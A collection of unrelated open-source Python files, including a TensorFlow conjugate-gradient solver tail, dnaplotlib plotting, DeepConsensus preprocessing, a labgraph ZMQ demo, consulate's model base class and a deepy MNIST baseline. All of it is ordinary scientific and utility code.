r = state.r - alpha * z
gamma = util.l2norm_squared(r)
beta = gamma / state.gamma
p = r + beta * state.p
return i + 1, cg_state(i + 1, x, r, p, gamma)
with ops.name_scope(name):
n = operator.shape[1:]
rhs = array_ops.expand_dims(rhs, -1)
gamma0 = util.l2norm_squared(rhs)
tol = tol * tol * gamma0
x = array_ops.expand_dims(
array_ops.zeros(
n, dtype=rhs.dtype.base_dtype), -1)
i = constant_op.constant(0, dtype=dtypes.int32)
state = cg_state(i=i, x=x, r=rhs, p=rhs, gamma=gamma0)
_, state = control_flow_ops.while_loop(stopping_criterion, cg_step,
[i, state])
return cg_state(
state.i,
x=array_ops.squeeze(state.x),
r=array_ops.squeeze(state.r),
p=array_ops.squeeze(state.p),
gamma=state.gamma)
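# Minimal usage sketch (illustrative only; `_DenseOperator` and `a_matrix` are
# not part of the contrib API): any object exposing `shape`, `dtype` and
# `apply` can be passed, e.g. a wrapper around a dense SPD matrix.
#
#   _DenseOperator = collections.namedtuple(
#       "DenseOperator", ["shape", "dtype", "apply"])
#   a_matrix = constant_op.constant([[4.0, 1.0], [1.0, 3.0]])
#   operator = _DenseOperator(
#       shape=[2, 2], dtype=a_matrix.dtype,
#       apply=lambda v: math_ops.matmul(a_matrix, v))
#   rhs = constant_op.constant([1.0, 2.0])
#   result = conjugate_gradient(operator, rhs, tol=1e-6, max_iter=50)
#   # result.x approximates the solution of a_matrix * x = rhs.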
|
gallery/scatter_annotate/scatter_annotate.py | zachfox/dnaplotlib | 267 | 12635375 | #!/usr/bin/env python
"""
Annotation of standard scatter plot with genetic constructs
"""
import numpy as np
import matplotlib.pyplot as plt
import dnaplotlib as dpl
import csv
__author__ = '<NAME> <<EMAIL>>, Voigt Lab, MIT'
__license__ = 'MIT'
__version__ = '1.0'
# Read some data points for the scatter plot
filename_in ='data_points.txt'
data_reader = csv.reader(open(filename_in, 'rU'), delimiter=' ')
x = []
y = []
for row in data_reader:
y.append( float(row[1]) )
x.append( float(row[2]) )
# Generate the scatter plot
fig = plt.figure(figsize=(2.8,2.32))
ax = plt.subplot(1, 1, 1)
ax.set_yscale('log')
ax.set_xlim([0.85,1.05])
ax.set_ylim([1,500])
ax.set_xticks([0.85, 0.9, 0.95, 1.0, 1.05])
ax.tick_params(axis='y', labelsize=8)
ax.tick_params(axis='x', labelsize=8)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.yaxis.set_ticks_position('left')
ax.xaxis.set_ticks_position('bottom')
plt.xlabel('Parameter 1', fontsize=8, labelpad=0)
plt.ylabel('Parameter 2', fontsize=8, labelpad=0)
ax.tick_params(axis='y', which='major', pad=1)
plt.scatter(x, y, c='none', s=6, edgecolor=(0.5,0.5,0.5), lw = 0.8) #(0.38, 0.65, 0.87)
# Add arrows to the constructs
plt.annotate(
'',
xy = (0.8785, 323.5), xytext = (25, 5),
textcoords = 'offset points', ha = 'right', va = 'bottom',
bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.5),
arrowprops = dict(arrowstyle = '->', linewidth=1.0, connectionstyle = 'arc3,rad=0'))
plt.annotate(
'',
xy = (0.977, 34), xytext = (20, 14),
textcoords = 'offset points', ha = 'right', va = 'bottom',
bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.5),
arrowprops = dict(arrowstyle = '->', linewidth=1.0, connectionstyle = 'arc3,rad=0'))
plt.annotate(
'',
xy = (0.982, 3.3), xytext = (22, 10),
textcoords = 'offset points', ha = 'right', va = 'bottom',
bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.5),
arrowprops = dict(arrowstyle = '->', linewidth=1.0, connectionstyle = 'arc3,rad=0'))
# Color maps (let's make sure we use similar colors)
col_map = {}
col_map['black'] = (0.00, 0.00, 0.00)
col_map['white'] = (1.00, 1.00, 1.00)
col_map['red'] = (0.95, 0.30, 0.25)
col_map['green'] = (0.38, 0.82, 0.32)
col_map['blue'] = (0.38, 0.65, 0.87)
col_map['orange'] = (1.00, 0.75, 0.17)
col_map['purple'] = (0.55, 0.35, 0.64)
col_map['yellow'] = (0.98, 0.97, 0.35)
# Global line width
lw = 1.0
# Define design 1
p1_1 = {'type':'Promoter', 'name':'pA', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black']}}
rbs_1_1 = {'type':'RBS', 'name':'rbs_f', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-6, 'x_extent':6}}
gA_1 = {'type':'CDS', 'name':'gA', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['red'], 'edgecolor':col_map['red'], 'x_extent':24, 'label':'A', 'label_style':'italic', 'label_color':(1,1,1), 'label_x_offset':-3, 'label_y_offset':-1}}
rbs_1_2 = {'type':'RBS', 'name':'rbs_r', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':2, 'x_extent':6}}
gB_1 = {'type':'CDS', 'name':'gB', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['blue'], 'edgecolor':col_map['blue'], 'x_extent':24, 'label':'B', 'label_style':'italic', 'label_color':(1,1,1), 'label_x_offset':-3, 'label_y_offset':-1}}
t1_1 = {'type':'Terminator', 'name':'t0', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-1}}
design1 = [p1_1, rbs_1_1, gA_1, rbs_1_2, gB_1, t1_1]
# Define design 2
t1_2 = {'type':'Terminator', 'name':'t0', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-1}}
gA_2 = {'type':'CDS', 'name':'gA', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['red'], 'edgecolor':col_map['red'], 'x_extent':24, 'label':'A', 'label_style':'italic', 'label_color':(1,1,1), 'label_x_offset':2, 'label_y_offset':-1}}
rbs_1_2 = {'type':'RBS', 'name':'rbs_f', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-6, 'x_extent':6}}
p1_2 = {'type':'Promoter', 'name':'pA', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['black']}}
p2_2 = {'type':'Promoter', 'name':'pA', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black']}}
rbs_2_2 = {'type':'RBS', 'name':'rbs_r', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-6, 'x_extent':6}}
gB_2 = {'type':'CDS', 'name':'gB', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['blue'], 'edgecolor':col_map['blue'], 'x_extent':24, 'label':'B', 'label_style':'italic', 'label_color':(1,1,1), 'label_x_offset':-3, 'label_y_offset':-1}}
t2_2 = {'type':'Terminator', 'name':'t0', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-1}}
design2 = [t1_2, gA_2, rbs_1_2, p1_2, p2_2, rbs_2_2, gB_2, t2_2]
# Define design 3
p1_3 = {'type':'Promoter', 'name':'pA', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black']}}
rbs_1_3 = {'type':'RBS', 'name':'rbs_r', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-6, 'x_extent':6}}
gA_3 = {'type':'CDS', 'name':'gB', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['red'], 'edgecolor':col_map['red'], 'x_extent':24, 'label':'A', 'label_style':'italic', 'label_color':(1,1,1), 'label_x_offset':-3, 'label_y_offset':-1}}
t1_3 = {'type':'Terminator', 'name':'t0', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-1}}
t2_3 = {'type':'Terminator', 'name':'t0', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-1}}
gB_3 = {'type':'CDS', 'name':'gA', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['blue'], 'edgecolor':col_map['blue'], 'x_extent':24, 'label':'B', 'label_style':'italic', 'label_color':(1,1,1), 'label_x_offset':0, 'label_y_offset':-1}}
rbs_2_3 = {'type':'RBS', 'name':'rbs_f', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-6, 'x_extent':6}}
p2_3 = {'type':'Promoter', 'name':'pA', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['black']}}
design3 = [p1_3, rbs_1_3, gA_3, t1_3, t2_3, gB_3, rbs_2_3, p2_3]
# Set up the axes for the genetic constructs
ax_dna1 = plt.axes([0.35, 0.83, 0.35, 0.12])
ax_dna2 = plt.axes([0.61, 0.65, 0.4, 0.12])
ax_dna3 = plt.axes([0.58, 0.32, 0.4, 0.12])
# Create the DNAplotlib renderer
dr = dpl.DNARenderer()
# Render the DNA to each axis
start, end = dr.renderDNA(ax_dna1, design1, dr.SBOL_part_renderers())
ax_dna1.set_xlim([start, end])
ax_dna1.set_ylim([-15,15])
ax_dna1.set_aspect('equal')
ax_dna1.set_xticks([])
ax_dna1.set_yticks([])
ax_dna1.axis('off')
start, end = dr.renderDNA(ax_dna2, design2, dr.SBOL_part_renderers())
ax_dna2.set_xlim([start, end])
ax_dna2.set_ylim([-15,15])
ax_dna2.set_aspect('equal')
ax_dna2.set_xticks([])
ax_dna2.set_yticks([])
ax_dna2.axis('off')
start, end = dr.renderDNA(ax_dna3, design3, dr.SBOL_part_renderers())
ax_dna3.set_xlim([start, end])
ax_dna3.set_ylim([-15,15])
ax_dna3.set_aspect('equal')
ax_dna3.set_xticks([])
ax_dna3.set_yticks([])
ax_dna3.axis('off')
# Sort out subplot spacing
plt.subplots_adjust(hspace=0.01, left=0.13, right=0.95, top=0.93, bottom=0.13)
# Save the figure
fig.savefig('scatter_annotate.pdf', transparent=True)
fig.savefig('scatter_annotate.png', dpi=300)
# Clear the plotting cache
plt.close('all')
|
deepconsensus/preprocess/preprocess.py | pichuan/deepconsensus | 106 | 12635376 |
# Copyright (c) 2021, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of Google Inc. nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
r"""Performs preprocessing of subread-aligned data.
Usage:
deepconsensus preprocess \
--subreads_to_ccs=subreads_to_ccs.bam \
--ccs_fasta=ccs_fasta.fasta \
--truth_bed=truth_bed.bed \
--truth_to_ccs=truth_to_ccs.bam \
--truth_split=truth_split.tsv \
[email protected] \
--cpus=4
"""
import collections
import functools
import json
import multiprocessing
import multiprocessing.pool
import os
import time
from typing import Dict, List
from absl import flags
from absl import logging
import tensorflow as tf
from deepconsensus.preprocess import utils
from deepconsensus.utils import dc_constants
from absl import app
AsyncResult = multiprocessing.pool.AsyncResult
Queue = multiprocessing.Queue
Issue = dc_constants.Issue
FLAGS = flags.FLAGS
flags.DEFINE_string('subreads_to_ccs', None,
'Input BAM containing subreads aligned to ccs.')
flags.DEFINE_string('ccs_fasta', None, 'Input FASTA containing ccs sequences.')
flags.DEFINE_string(
'output', None,
('Output filename. If training, use @split wildcard for split name. '
'For example: [email protected]'
'The output filename must end in .tfrecord.gz'))
flags.DEFINE_string('truth_to_ccs', None, 'Input truth bam aligned to ccs.')
flags.DEFINE_string('truth_bed', None, 'Input truth bedfile.')
# TODO TODO
flags.DEFINE_string('truth_split', None,
'Input file defining train/eval/test splits.')
flags.DEFINE_integer(
'cpus',
multiprocessing.cpu_count(),
'Number of worker processes to use. Use 0 to disable parallel processing. '
'Minimum of 2 CPUs required for parallel processing.',
short_name='j')
flags.DEFINE_integer('bam_reader_threads', 8,
'Number of decompression threads to use.')
flags.DEFINE_integer('limit', 0, 'Limit processing to n ZMWs.')
def register_required_flags():
flags.mark_flags_as_required([
'subreads_to_ccs',
'ccs_fasta',
'output',
])
def trace_exception(f):
"""Decorator to catch errors run in multiprocessing processes."""
@functools.wraps(f)
def wrap(*args, **kwargs):
try:
result = f(*args, **kwargs)
return result
except: # pylint: disable=bare-except
logging.exception('Error in function %s.', f.__name__)
raise Exception('Error in worker process')
return wrap
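# A minimal sketch of how trace_exception is meant to be used (risky_worker is a
# made-up name): any exception raised inside the decorated worker is logged with
# its traceback and re-raised as a generic worker-process error.
#
#   @trace_exception
#   def risky_worker(x):
#     return 1 / x
#
#   risky_worker(0)  # logs 'Error in function risky_worker.' and raises Exception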
def make_dirs(path):
# Create directories for filename
tf.io.gfile.makedirs(os.path.dirname(path))
def setup_writers(output_fname: str,
splits: List[str]) -> Dict[str, tf.io.TFRecordWriter]:
"""Creates tf writers for split set."""
tf_writers = {}
tf_ops = tf.io.TFRecordOptions(compression_type='GZIP')
for split in splits:
split_fname = output_fname.replace('@split', split)
# Create subdirs if necessary.
make_dirs(split_fname)
tf_writers[split] = tf.io.TFRecordWriter(split_fname, tf_ops)
return tf_writers
def write_tf_record(tf_example_str_set: List[bytes], split: str,
tf_writers: Dict[str, tf.io.TFRecordWriter]):
"""Writes tf examples to a split."""
for tf_example_str in tf_example_str_set:
tf_writers[split].write(tf_example_str)
tf_writers[split].flush()
@trace_exception
def tf_record_writer(output_fname: str, splits: List[str],
queue: Queue) -> bool:
"""tf_record writing worker."""
tf_writers = setup_writers(output_fname, splits)
while True:
tf_example_str_set, split = queue.get()
if split == 'kill':
break
write_tf_record(tf_example_str_set, split, tf_writers)
for writer in tf_writers.values():
writer.close()
return True
@trace_exception
def process_subreads(subreads: List[utils.Read],
ccs_seqname: str,
dc_config: utils.DcConfig,
split: str,
queue: Queue,
local=False):
"""Subread processing worker."""
tf_out = []
dc_example = utils.subreads_to_dc_example(subreads, ccs_seqname, dc_config)
for example in dc_example.iter_examples():
tf_out.append(example.tf_example().SerializeToString())
dc_example.counter[f'n_examples_{split}'] += len(tf_out)
dc_example.counter['n_examples'] += len(tf_out)
if local:
return tf_out, split, dc_example.counter
else:
queue.put([tf_out, split])
# Return a counter object for each ZMW.
return dc_example.counter
def clear_tasks(tasks: List[AsyncResult],
main_counter: collections.Counter) -> List[AsyncResult]:
"""Clear successful tasks and log result."""
for task in tasks:
if task.ready():
if task.successful():
# Fetch task results and integrate into main counter
counter = task.get()[0]
main_counter.update(counter)
tasks.remove(task)
else:
raise Exception('A worker process failed.')
logging.info('Processed %s ZMWs.', main_counter['n_zmw_pass'])
return tasks
def main(unused_argv) -> None:
if FLAGS.cpus == 1:
raise ValueError('Must set cpus to 0 or >=2 for parallel processing.')
is_training = FLAGS.truth_to_ccs and FLAGS.truth_bed and FLAGS.truth_split
if not FLAGS.output.endswith('.tfrecord.gz'):
raise ValueError('--output must end with .tfrecord.gz')
if is_training:
logging.info('Generating tf.Examples in training mode.')
contig_split = utils.read_truth_split(FLAGS.truth_split)
splits = set(contig_split.values())
for split in splits:
if '@split' not in FLAGS.output:
raise ValueError('You must add @split to --output when training.')
elif FLAGS.truth_to_ccs or FLAGS.truth_bed or FLAGS.truth_split:
err_msg = ('You must specify truth_to_ccs, truth_bed, and truth_split '
'to generate a training dataset.')
raise Exception(err_msg)
else:
logging.info('Generating tf.Examples in inference mode.')
splits = ['inference']
manager = multiprocessing.Manager()
queue = manager.Queue()
dc_config = utils.DcConfig(max_passes=20, example_width=100, padding=20)
proc_feeder, main_counter = utils.create_proc_feeder(
subreads_to_ccs=FLAGS.subreads_to_ccs,
ccs_fasta=FLAGS.ccs_fasta,
dc_config=dc_config,
truth_bed=FLAGS.truth_bed,
truth_to_ccs=FLAGS.truth_to_ccs,
truth_split=FLAGS.truth_split,
limit=FLAGS.limit,
bam_reader_threads=FLAGS.bam_reader_threads)
if FLAGS.cpus == 0:
logging.info('Using a single cpu.')
tf_writers = setup_writers(FLAGS.output, splits)
for args in proc_feeder():
tf_example_str_set, split, counter = process_subreads(
*args, queue=None, local=True)
write_tf_record(tf_example_str_set, split, tf_writers)
# Update counter
main_counter.update(counter)
if main_counter['n_zmw_pass'] % 20 == 0:
logging.info('Processed %s ZMWs.', main_counter['n_zmw_pass'])
else:
logging.info('Processing in parallel using %s cores', FLAGS.cpus)
with multiprocessing.Pool(FLAGS.cpus) as pool:
# Setup parallelization
tf_writer = pool.apply_async(tf_record_writer,
(FLAGS.output, splits, queue))
tasks = []
for args in proc_feeder():
tasks.append(pool.starmap_async(process_subreads, ([*args, queue],)))
if main_counter['n_zmw_pass'] % 20 == 0:
tasks = clear_tasks(tasks, main_counter)
while tasks:
time.sleep(0.5)
tasks = clear_tasks(tasks, main_counter)
# Cleanup multiprocessing.
queue.put(['', 'kill'])
tf_writer.get()
manager.shutdown()
pool.close()
pool.join()
# Write summary
logging.info('Completed processing %s ZMWs.', main_counter['n_zmw_pass'])
summary_name = 'training' if is_training else 'inference'
dataset_summary = FLAGS.output.replace('.tfrecord.gz',
f'.{summary_name}.json')
# Remove @split from filenames
dataset_summary = dataset_summary.replace('@split', 'summary')
logging.info('Writing %s.', dataset_summary)
make_dirs(dataset_summary)
with open(dataset_summary, 'w') as summary_file:
summary = dict(main_counter.items())
summary.update(dc_config.to_dict())
flag_list = [
'subreads_to_ccs', 'ccs_fasta', 'truth_to_ccs', 'truth_bed',
'truth_split'
]
for flag in flag_list:
summary[flag] = FLAGS[flag].value
summary['version'] = dc_constants.__version__
json_summary = json.dumps(summary, indent=True)
summary_file.write(json_summary)
if __name__ == '__main__':
logging.use_python_logging()
app.run(main)
|
labgraph/examples/simple_viz_zmq.py | Yunusbcr/labgraph | 124 | 12635392 |
#!/usr/bin/env python3
# Copyright 2004-present Facebook. All Rights Reserved.
# Built-in imports
import asyncio
from labgraph.zmq_node.zmq_message import ZMQMessage
from labgraph.zmq_node.zmq_poller_node import ZMQPollerConfig
import time
from dataclasses import field
from typing import Any, List, Optional, Tuple
# Import labgraph
import labgraph as lg
from labgraph.zmq_node import ZMQPollerNode
# Imports required for this example
import matplotlib.animation as animation
import matplotlib.axes
import matplotlib.pyplot as plt
import numpy as np
# Constants used by nodes
NUM_FEATURES = 100
WINDOW = 2.0
REFRESH_RATE = 2.0
ENDPOINT = "tcp://localhost:5555" # For ZMQ
TOPIC = "randomstream" # For ZMQ
# A data type used in streaming, see docs: Messages
class RandomMessage(lg.Message):
timestamp: float
data: np.ndarray
# ================================= ZMQ deserializer ==================================
# A shim to feed ZMQ data to the rolling averager
class ZMQDeserializer(lg.Node):
INPUT = lg.Topic(ZMQMessage)
OUTPUT = lg.Topic(RandomMessage)
# Take the raw data and reify it to a RandomMessage
@lg.subscriber(INPUT)
@lg.publisher(OUTPUT)
async def deserialize(self, message: ZMQMessage) -> lg.AsyncPublisher:
yield self.OUTPUT, RandomMessage(timestamp=time.time(), data=np.frombuffer(message.data))
# ================================= ROLLING AVERAGER ===================================
# The state of the RollingAverager node: holds windowed messages
class RollingState(lg.State):
messages: List[RandomMessage] = field(default_factory=list)
# Configuration for RollingAverager
class RollingConfig(lg.Config):
window: float # Window, in seconds, to average over
# A transformer node that accepts some data on an input topic and averages that data
# over the configured window to its output topic
class RollingAverager(lg.Node):
INPUT = lg.Topic(RandomMessage)
OUTPUT = lg.Topic(RandomMessage)
state: RollingState
config: RollingConfig
# A transformer method that transforms data from one topic into another
@lg.subscriber(INPUT)
@lg.publisher(OUTPUT)
async def average(self, message: RandomMessage) -> lg.AsyncPublisher:
current_time = time.time()
self.state.messages.append(message)
self.state.messages = [
message
for message in self.state.messages
if message.timestamp >= current_time - self.config.window
]
if len(self.state.messages) == 0:
return
all_data = np.stack([message.data for message in self.state.messages])
mean_data = np.mean(all_data, axis=0)
yield self.OUTPUT, RandomMessage(timestamp=current_time, data=mean_data)
# ================================== AVERAGED NOISE ====================================
# Configuration for AveragedNoise
class AveragedNoiseConfig(lg.Config):
num_features: int # Number of features to generate
window: float # Window, in seconds, to average over
read_addr: str
zmq_topic: str
poll_time: float
# A group that combines noise generation and rolling averaging. The output topic
# contains averaged noise. We could just put all three nodes in a graph below, but we
# add this group to demonstrate the grouping functionality.
class AveragedNoise(lg.Group):
OUTPUT = lg.Topic(RandomMessage)
config: AveragedNoiseConfig
ZMQ: ZMQPollerNode
ZMQ_DESERIALIZER: ZMQDeserializer
ROLLING_AVERAGER: RollingAverager
def connections(self) -> lg.Connections:
        # To produce averaged noise, we connect the ZMQ poller and deserializer to the averager
# Then we "expose" the averager's output as an output of this group
return (
(self.ZMQ.topic, self.ZMQ_DESERIALIZER.INPUT),
(self.ZMQ_DESERIALIZER.OUTPUT, self.ROLLING_AVERAGER.INPUT),
(self.ROLLING_AVERAGER.OUTPUT, self.OUTPUT),
)
def setup(self) -> None:
# Cascade this group's configuration to its contained nodes
self.ZMQ.configure(
ZMQPollerConfig(
read_addr=self.config.read_addr,
zmq_topic=self.config.zmq_topic,
poll_time=self.config.poll_time
)
)
self.ROLLING_AVERAGER.configure(RollingConfig(window=self.config.window))
# ======================================= PLOT =========================================
# The state of the Plot: holds the most recent data received, which should be displayed
class PlotState(lg.State):
data: Optional[np.ndarray] = None
# The configuration for the Plot
class PlotConfig(lg.Config):
refresh_rate: float # How frequently to refresh the bar graph
num_bars: int # The number of bars to display (note this should be == num_features)
# A node that creates a matplotlib bar graph that displays the produced data in
# real-time
class Plot(lg.Node):
INPUT = lg.Topic(RandomMessage)
state: PlotState
config: PlotConfig
def setup(self) -> None:
self.ax: Optional[matplotlib.axes.Axes] = None
# A subscriber method that simply receives data and updates the node's state
@lg.subscriber(INPUT)
def got_message(self, message: RandomMessage) -> None:
self.state.data = message.data
# A main method does not interact with topics, but has its own line of execution -
# this can be useful for Python libraries that must be run in the main thread. For
# example, scikit-learn and pyqtgraph are libraries that need the main thread.
@lg.main
def run_plot(self) -> None:
fig = plt.figure()
self.ax = fig.add_subplot(1, 1, 1)
self.ax.set_ylim((0, 1))
anim = animation.FuncAnimation( # noqa: F841
fig, self._animate, interval=1 / self.config.refresh_rate * 1000
)
plt.show()
raise lg.NormalTermination()
def _animate(self, i: int) -> None:
if self.ax is None or self.state.data is None:
return
self.ax.clear()
self.ax.set_ylim([0, 1])
self.ax.bar(range(self.config.num_bars), self.state.data)
# ======================================= DEMO =========================================
# A graph for the demo in this example. Hooks together the AveragedNoise group
# (containing ZMQPollerNode, ZMQDeserializer, and RollingAverager) and the Plot node.
class Demo(lg.Graph):
AVERAGED_NOISE: AveragedNoise
PLOT: Plot
def setup(self) -> None:
# Provide configuration using global constants (but if we wanted to, we could
# have a configuration object provided to this graph as well).
self.AVERAGED_NOISE.configure(
AveragedNoiseConfig(
num_features=NUM_FEATURES, window=WINDOW,
read_addr=ENDPOINT, zmq_topic=TOPIC, poll_time=1.0
)
)
self.PLOT.configure(
PlotConfig(refresh_rate=REFRESH_RATE, num_bars=NUM_FEATURES)
)
# Connect the AveragedNoise output to the Plot input
def connections(self) -> lg.Connections:
return ((self.AVERAGED_NOISE.OUTPUT, self.PLOT.INPUT),)
# Parallelization: Run AveragedNoise and Plot in separate processes
def process_modules(self) -> Tuple[lg.Module, ...]:
return (self.AVERAGED_NOISE, self.PLOT)
# Entry point: run the Demo graph
# This demo does the same thing as simple_viz.py, but uses a zmq source (zmq_source.py) rather
# than a hardcoded source.
if __name__ == "__main__":
print("Initializing ZMQ demo - please run zmq_source.py in another terminal.")
lg.run(Demo)
|
consulate/models/base.py | Beahmer89/consulate | 309 | 12635396 |
# coding=utf-8
"""
Base Model
"""
import collections.abc
class Model(collections.abc.Iterable):
    """A model contains an __attributes__ map that defines each attribute's
    name, its type for type validation, an optional validation method, and
    optional functions used to cast the value to and from its serialized form.
    .. python::
        class MyModel(Model):
            __attributes__ = {
                'ID': {
                    'type': uuid.UUID,
                    'required': False,
                    'default': None,
                    'cast_from': str,
                    'cast_to': str
                },
                'Serial': {
                    'type': int,
                    'required': True,
                    'default': 0,
                    'validator': lambda value, model: value >= 0,
                }
            }
    """
__attributes__ = {}
"""The attributes that define the data elements of the model"""
def __init__(self, **kwargs):
super(Model, self).__init__()
[setattr(self, name, value) for name, value in kwargs.items()]
[self._set_default(name) for name in self.__attributes__.keys()
if name not in kwargs.keys()]
def __iter__(self):
"""Iterate through the model's key, value pairs.
:rtype: iterator
"""
for name in self.__attributes__.keys():
value = self._maybe_cast_value(name)
if value is not None:
yield self._maybe_return_key(name), value
def __setattr__(self, name, value):
"""Set the value for an attribute of the model, validating the
attribute name and its type if the type is defined in ``__types__``.
:param str name: The attribute name
:param mixed value: The value to set
:raises: AttributeError
:raises: TypeError
:raises: ValueError
"""
if name not in self.__attributes__:
raise AttributeError('Invalid attribute "{}"'.format(name))
value = self._validate_value(name, value)
super(Model, self).__setattr__(name, value)
def __getattribute__(self, name):
"""Return the attribute from the model if it is set, otherwise
returning the default if one is set.
:param str name: The attribute name
:rtype: mixed
"""
try:
return super(Model, self).__getattribute__(name)
except AttributeError:
if name in self.__attributes__:
return self.__attributes__[name].get('default', None)
raise
def _maybe_cast_value(self, name):
"""Return the attribute value, possibly cast to a different type if
the ``cast_to`` item is set in the attribute definition.
:param str name: The attribute name
:rtype: mixed
"""
value = getattr(self, name)
if value is not None and self.__attributes__[name].get('cast_to'):
return self.__attributes__[name]['cast_to'](value)
return value
def _maybe_return_key(self, name):
"""Return the attribute name as specified in it's ``key`` definition,
if specified. This is to map python attribute names to their Consul
alternatives.
:param str name: The attribute name
:rtype: mixed
"""
if self.__attributes__[name].get('key'):
return self.__attributes__[name]['key']
return name
def _required_attr(self, name):
"""Returns :data:`True` if the attribute is required.
:param str name: The attribute name
:rtype: bool
"""
return self.__attributes__[name].get('required', False)
def _set_default(self, name):
"""Set the default value for the attribute name.
:param str name: The attribute name
"""
setattr(self, name, self.__attributes__[name].get('default', None))
def _validate_value(self, name, value):
"""Ensures the the value validates based upon the type or a validation
function, raising an error if it does not.
:param str name: The attribute name
:param mixed value: The value that is being set
:rtype: mixed
:raises: TypeError
:raises: ValueError
"""
if value is None:
if self._required_attr(name):
raise ValueError('Attribute "{}" is required'.format(name))
return
if not isinstance(value, self.__attributes__[name].get('type')):
cast_from = self.__attributes__[name].get('cast_from')
if cast_from and isinstance(value, cast_from):
value = self.__attributes__[name]['type'](value)
else:
raise TypeError(
'Attribute "{}" must be of type {} not {}'.format(
name, self.__attributes__[name]['type'].__name__,
value.__class__.__name__))
if self.__attributes__[name].get('enum') \
and value not in self.__attributes__[name]['enum']:
raise ValueError(
'Attribute "{}" value {!r} not valid'.format(name, value))
validator = self.__attributes__[name].get('validator')
if callable(validator):
if not validator(value, self):
raise ValueError(
'Attribute "{}" value {!r} did not validate'.format(
name, value))
return value
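# A minimal usage sketch (ExampleService is a hypothetical model, not part of
# consulate): subclasses declare __attributes__ and the base class supplies
# defaults, casting and validation; iterating an instance yields (key, value) pairs.
#
#   class ExampleService(Model):
#       __attributes__ = {
#           'Name': {'type': str, 'required': True},
#           'TTL': {'type': int, 'required': False, 'default': 30,
#                   'validator': lambda value, model: value > 0},
#       }
#
#   service = ExampleService(Name='api', TTL=60)
#   dict(service)  # {'Name': 'api', 'TTL': 60}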
|
examples/batch_normalization/mnist_baseline.py | uaca/deepy | 260 | 12635407 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This experiment setting is described in http://arxiv.org/pdf/1502.03167v3.pdf.
MNIST MLP baseline model.
The Gaussian initialization described in the paper did not converge; I have no idea why.
"""
import logging, os
logging.basicConfig(level=logging.INFO)
from deepy.dataset import MnistDataset, MiniBatches
from deepy.networks import NeuralClassifier
from deepy.layers import Dense, Softmax
from deepy.trainers import SGDTrainer
default_model = os.path.join(os.path.dirname(__file__), "models", "baseline1.gz")
if __name__ == '__main__':
model = NeuralClassifier(input_dim=28 * 28)
model.stack(Dense(100, 'sigmoid'),
Dense(100, 'sigmoid'),
Dense(100, 'sigmoid'),
Dense(10, 'linear'),
Softmax())
trainer = SGDTrainer(model)
batches = MiniBatches(MnistDataset(), batch_size=60)
trainer.run(batches, epoch_controllers=[])
model.save_params(default_model) |
src/super_gradients/common/decorators/deci_logger.py | Deci-AI/super-gradients | 308 | 12635422 |
def deci_func_logger(_func=None, *, name: str = 'abstract_decorator'):
"""
    This decorator is used to wrap our functions with logs.
    It will log every entry and exit of the function, with the equivalent parameters as extras.
    It will also log exceptions raised inside the function.
    It will also log the execution time of the function.
    How it works:
    First it checks whether the decorator was called with the name keyword.
    If so, it returns a new decorator whose logger is named after the name parameter.
    If not, it returns a new decorator whose logger is named after the wrapped function.
    The returned decorator then returns a new function that wraps the original function with the logging logic.
    For further background, see the Real Python "fancy decorators" documentation.
    Args:
        _func (): used when the decorator is applied without specifying name; don't pass it directly.
